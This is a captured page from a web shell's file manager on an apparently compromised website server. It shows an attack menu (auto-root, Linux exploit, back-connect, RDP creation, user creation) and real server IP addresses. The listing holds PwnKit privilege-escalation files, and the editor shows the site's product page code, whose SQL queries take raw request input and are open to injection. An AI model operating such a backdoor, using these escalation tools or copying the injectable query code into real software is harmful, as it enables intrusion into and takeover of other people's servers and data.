Linux linux7.web4world.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
: 199.38.113.107 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
?5.6.40
siddhapu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
siddhapu /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
?;
.pkexec
[ DIR ]
drwxr-xr-x
?;
.well-known
[ DIR ]
drwxr-xr-x
?;
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
?;
assets
[ DIR ]
drwxr-xr-x
?;
authentic_siddhapura_machine
[ DIR ]
drwxr-xr-x
?;
database_19_11_2020
[ DIR ]
drwxr-xr-x
?;
einvite
[ DIR ]
drwxr-xr-x
.htaccess
1.88
KB
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.user.ini
583
B
-rw-r--r--
400.shtml
16.38
KB
-rw-r--r--
403.shtml
16.38
KB
-rw-r--r--
404.php
1.48
KB
-rw-r--r--
404.shtml
16.39
KB
-rw-r--r--
503.shtml
15.33
KB
-rw-r--r--
about.php
5.51
KB
-rw-r--r--
certification.php
987
B
-rw-r--r--
config.php
197
B
-rw-r--r--
contact.php
3.84
KB
-rw-r--r--
eventsandexhibition.php
1.14
KB
-rw-r--r--
exhibition.php
1.36
KB
-rw-r--r--
exhibition_category.php
1.19
KB
-rw-r--r--
footer.php
7.35
KB
-rw-r--r--
header.php
10.34
KB
-rw-r--r--
index.php
4.03
KB
-r--r--r--
mailcheck.php
0
B
-rw-r--r--
php.ini
577
B
-rw-r--r--
product.php
2.79
KB
-rw-r--r--
product_category.php
2.21
KB
-rw-r--r--
product_details.php
3.46
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
slider.php
1.23
KB
-rw-r--r--
ss.php
15.03
KB
-rw-r--r--
working_site_backup_19_11_2020...
89.41
MB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : product_details.php
<!doctype html> <html class="no-js" lang="zxx"> <body> <?php include("header.php"); ?> <main> <!-- slider Area Start--> <!-- slider Area End--> <?php $id = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]"; $id = substr($id, strpos($id, "=") + 1); $id = str_replace("%20"," ",$id); $qur="SELECT * FROM `machinery` WHERE machinery_model_no='".$id."'"; $result=mysqli_query($c,$qur); if((mysqli_num_rows($result))>=1) { while($row=mysqli_fetch_array($result)) { ?> <h3 style="text-align: center; margin-top:20px;background:#191a33;color: #ffffff;" ><?php echo $row['machinery_dept']?></h3> <?php function isMobileDevice() { return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]); }?> <!-- Services Details Start --> <div class="services-details-area "> <div class="container"> <div class="row "> <div class="col-12"> <?php if(!isMobileDevice()){?> <a href="assets/img/products/particular/<?php echo strtoupper($row['img_nm']);?>" class="img-pop-up"> <img src="assets/img/products/particular/<?php echo strtoupper($row['img_nm']);?>" class="img-fluid centerimgpc" > </a> <?php } else {?> <a href="assets/img/products/particular/<?php echo strtoupper($row['img_nm']);?>" class="img-pop-up"> <img src="assets/img/products/particular/<?php echo strtoupper($row['img_nm']);?>" class="img-fluid centerimgmob " > </a> <?php } ?> <h3 style="text-align:center;"><?php echo strtoupper($row['machinery_name']);?></h3> </div> <table border="1" width="100%" border="0" cellpadding="5" cellspacing="0"> <tbody> <tr> <?php $fb="SELECT * FROM `sm_details` where id=13"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <th width="33%" align="left" bgcolor="#191a33"> <h3 style="color:#FFF"> <?php echo $fbar['sm_detail'];?></h3></th> <?php $fb="SELECT * FROM `sm_details` where id=14"; $fbid=mysqli_query($c,$fb);$fbar=mysqli_fetch_array($fbid);?> <th colspan="4" width="67%" align="left" bgcolor="#191a33"> <h3 style="color: #FFF"> <?php echo $fbar['sm_detail'];?> <?php echo strtoupper(str_replace("#,"," , ",$row['machinery_model_no']))."</h3>";?> </th> <?php }}?> </tr> <?php $qur="SELECT * FROM `".$id."`" ; $result=mysqli_query($c,$qur); if((mysqli_num_rows($result))>=1) { $deptnmmat =""; while($row=mysqli_fetch_array($result)) { ?> <tr> <td <?php if($row['detail']==""){ echo " colspan='2' > <strong>".$row['specification']."</strong>";} else {echo "> ".$row['specification']; ?></td> <td><?php echo $row['detail']; }?></td> </tr> <?php }}?> </tbody> </table> </div> </div> </div> <!-- Services Details End --> </main> <?php include("footer.php"); ?> </body> </html>
Close